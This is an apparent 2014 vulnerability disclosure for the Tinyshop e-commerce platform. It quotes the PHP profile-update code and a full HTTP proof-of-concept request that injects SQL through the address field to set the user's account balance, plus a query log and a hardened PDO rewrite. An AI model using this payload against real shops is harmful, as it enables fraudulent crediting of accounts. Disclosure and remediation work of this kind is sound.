Tinyshop balance-inflation vulnerability
2014-11-09 07:48:00    Source: magerx

I previously saw a balance-inflation vulnerability in it. It was patched, but when I looked again it was still exploitable: the fix only covered the earlier issue of POST parameters overwriting the data array.


/protected/controllers/ucenter.php, line 393:

public function info_save()
{
    $rules = array('name:required:昵称不能为空!','real_name:required:真实姓名不能为空!','sex:int:性别必需选择!','birthday:date:生日日期格式不正确!','mobile:mobi:手机格式不正确','phone:phone:电话格式不正确');
    $info = Validator::check($rules);
    if(is_array($info)){
        $this->redirect("info",false,array('msg'=>array("info",$info['msg'])));
    }else{
        // Only name, real_name, sex and addr pass through a Filter; the
        // remaining request values are taken as-is.
        $data = array(
            'name'=>Filter::str(Req::args('name')),
            'real_name'=>Filter::str(Req::args('real_name')),
            'sex'=>Filter::int(Req::args('sex')),
            'birthday'=>Req::args('birthday'),
            'mobile'=>Req::args('mobile'),
            'phone'=>Req::args('phone'),
            'province'=>Req::args('province'),
            'city'=>Req::args('city'),
            'county'=>Req::args('county'),
            'addr'=>Filter::text(Req::args('addr'))
        );
    }
    $name = Filter::sql(Req::args("name"));
    $id = $this->user['id'];
    $this->model->table("user")->data(array("name"=>$name))->where("id=$id")->update();

    // The whole $data array is handed to the customer UPDATE.
    $this->model->table("customer")->data($data)->where("user_id=$id")->update();
    $obj = $this->model->table("user as us")->join("left join customer as cu on us.id = cu.user_id")->fields("us.*,cu.group_id,cu.login_time")->where("us.id=$id")->find();
    $this->safebox->set('user',$obj,$this->cookie_time);
    $this->redirect("info");
}

Looking at the above, the filtering at the following places is flawed:

'birthday'=>Req::args('birthday'),
'mobile'=>Req::args('mobile'),
'phone'=>Req::args('phone'),
'province'=>Req::args('province'),
'city'=>Req::args('city'),
'county'=>Req::args('county'),
'addr'=>Filter::text(Req::args('addr'))


This makes SQL injection possible, but we do not care about that here: the user's account balance column, `balance`, lives in the same table, so we can credit our own account directly through this UPDATE instead of using the injection for blind extraction.

Proof of vulnerability:

PoC:

POST /tinyshop/index.php?con=ucenter&act=info_save HTTP/1.1
Host: localhost
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:31.0) Gecko/20100101 Firefox/31.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate
DNT: 1
Referer: https://localhost/tinyshop/index.php?con=ucenter&act=info
Cookie: CNZZDATA80862620=cnzz_eid%3D163438544-1407551214-http%253A%252F%252Flocalhost%252F%26ntime%3D1408007142; bdshare_firstime=1407551237892; tm_ibc=0; ZDEDebuggerPresent=php,phtml,php3; CNZZDATA1670348=cnzz_eid%3D2114245156-1409299086-http%253A%252F%252Flocalhost%252F%26ntime%3D1409299086; ver=free; PHPSESSID=f2943c79c9d287ef2a0136f0525e9fb3; language=5ad2ae3c20c17a82d4b61aaa71f61e05f5b4a0a2s%3A5%3A%22zh_cn%22%3B; 1_product=f5de13e802a02fac20482edfe9ee2d303641bc6ds%3A1%3A%221%22%3B; pageSize=7fe99f844d5233ed16ab2d46f0b885fe7b213e04s%3A2%3A%2220%22%3B; safecode=1; Tiny_autologin=ed6460c9a8OTU2Nzg2NTAwMmFiNDQ9NTsyMzBjOGJlNjAyZjJlY2c
Connection: keep-alive
Content-Type: application/x-www-form-urlencoded
Content-Length: 161

name=test1%40qq.com&real_name=1&sex=0&birthday=2014-09-30&mobile=13900000001&phone=13222222222&province=420000&city=421300&county=421301&addr=111111',balance=1000#



SQL query log:

187323 Query update tiny_customer set `real_name` = '1',`sex` = 0,`birthday` = '2014-09-30',`mobile` = '13900000001',`phone` = '13222222222',`province` = 420000,`city` = 421300,`county` = 421301,`addr` = '111111',balance=1000#' where user_id=4

Result:

[Image: tinyshop_1.jpg]

Remediation:
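A hardened form of this update path, as an added example (not Tinyshop's own code or its later fix): strict per-field validation plus a PDO prepared statement whose column list is fixed in code. It assumes a PDO connection `$pdo` and the tiny_customer table and column names seen in the query log above; the validation rules themselves are illustrative.

```php
<?php
// Added example, not Tinyshop's code. Assumes a PDO connection ($pdo) and the
// tiny_customer columns from the query log; the validator rules are illustrative.
function validate_profile(array $args): array
{
    $data = [];
    $errors = [];
    // Free-text fields: length-limited. No SQL escaping is needed because the
    // values are bound as parameters in save_profile(), never spliced into SQL.
    foreach (['name', 'real_name', 'addr'] as $f) {
        $v = trim((string)($args[$f] ?? ''));
        if ($v === '' || mb_strlen($v) > 100) { $errors[] = "$f is invalid"; }
        $data[$f] = $v;
    }
    // Date: must round-trip through a fixed format, so trailing junk is rejected.
    $raw = (string)($args['birthday'] ?? '');
    $d = DateTime::createFromFormat('Y-m-d', $raw);
    if ($d === false || $d->format('Y-m-d') !== $raw) { $errors[] = 'birthday is invalid'; }
    $data['birthday'] = $raw;
    // Phone numbers: digits only.
    foreach (['mobile', 'phone'] as $f) {
        $v = (string)($args[$f] ?? '');
        if (!preg_match('/^\d{6,20}$/', $v)) { $errors[] = "$f is invalid"; }
        $data[$f] = $v;
    }
    // Sex and region codes: integers only (the original passed them through raw).
    foreach (['sex', 'province', 'city', 'county'] as $f) {
        $v = filter_var($args[$f] ?? null, FILTER_VALIDATE_INT);
        if ($v === false) { $errors[] = "$f is invalid"; }
        $data[$f] = $v;
    }
    return [$data, $errors];
}

function save_profile(PDO $pdo, int $userId, array $data): int
{
    // The column list is fixed in code, so a request can never add `balance`
    // or any other column, and every value travels as a bound parameter.
    $cols = ['name', 'real_name', 'sex', 'birthday', 'mobile', 'phone',
             'province', 'city', 'county', 'addr'];
    $set = implode(', ', array_map(fn ($c) => "`$c` = :$c", $cols));
    $stmt = $pdo->prepare("UPDATE tiny_customer SET $set WHERE user_id = :uid");
    foreach ($cols as $c) {
        $stmt->bindValue(":$c", $data[$c], is_int($data[$c]) ? PDO::PARAM_INT : PDO::PARAM_STR);
    }
    $stmt->bindValue(':uid', $userId, PDO::PARAM_INT);
    $stmt->execute();
    return $stmt->rowCount();
}
```

Call validate_profile() first and pass its $data to save_profile() only when $errors is empty; with the request body from the PoC above, the addr value is stored literally as a bound string and the UPDATE can only touch the ten listed columns.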
